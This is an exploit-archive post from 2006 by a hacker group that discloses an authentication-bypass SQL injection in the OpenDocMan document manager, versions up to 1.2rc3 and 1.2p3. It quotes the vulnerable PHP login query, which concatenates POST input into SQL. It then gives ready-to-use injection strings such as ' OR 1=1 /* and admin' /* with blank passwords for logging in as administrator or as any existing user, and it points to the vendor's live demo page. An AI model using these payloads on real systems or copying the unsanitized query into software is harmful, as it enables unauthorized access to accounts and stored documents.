Home / exploitsPDF  

opendocman-1.2rc3.txt

Posted on 31 October 2006

######################################################################## # opendocman <= 1.2rc3 Bypass admin/user Login # affected to opendocman-1.2p3 # Download Source : http://www.opendocman.com/ # # Found By : k1tk4t - k1tk4t[4t]newhack.org # Location : Indonesia -- #newhack[dot]org @irc.dal.net ######################################################################## file; index.php ######################################################################## bugs; $frmuser = $_POST['frmuser']; $frmpass = $_POST['frmpass']; $query = "SELECT id, username, password FROM user WHERE username = '$frmuser' AND password = password('$frmpass')"; $result = mysql_query("$query") or die ("Error in query: $query. " . mysql_error()); $result = mysql_query("$query") or die ("Error in query: $query. " . mysql_error()); ######################################################################## exploit/POC; if magic_quotes_gpc = Off -- u can do this; for opendocman-1.2rc3 Login administrator username : ' OR 1=1 /* password : blank Login User username : username' /* password : blank opendocman-1.2p3 Login Form username : admin' /* password : blank in opendocman-1.2p3 use; if(!valid_username($_POST['frmuser'] so u just bypass login username existing in database http://www.opendocman.com/demo/index.php ######################################################################## Thanks; str0ke xoron [www.xoron.biz] [mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 evilcode,illibero,NoGe,nyubi,x-ace,ghoz, home_edition2001,matdhule,iFX, and for all(friend's&enemy) @irc.dal.net #newhack[dot]org [all member&staff] #e-c-h-o [all member echo community] #nyubicrew [all member solpotcrew community] #asiahacker [all member asiahacker community] -- best regard' k1tk4t http://newhack.org newhack[dot]org@irc.dal.net

 

TOP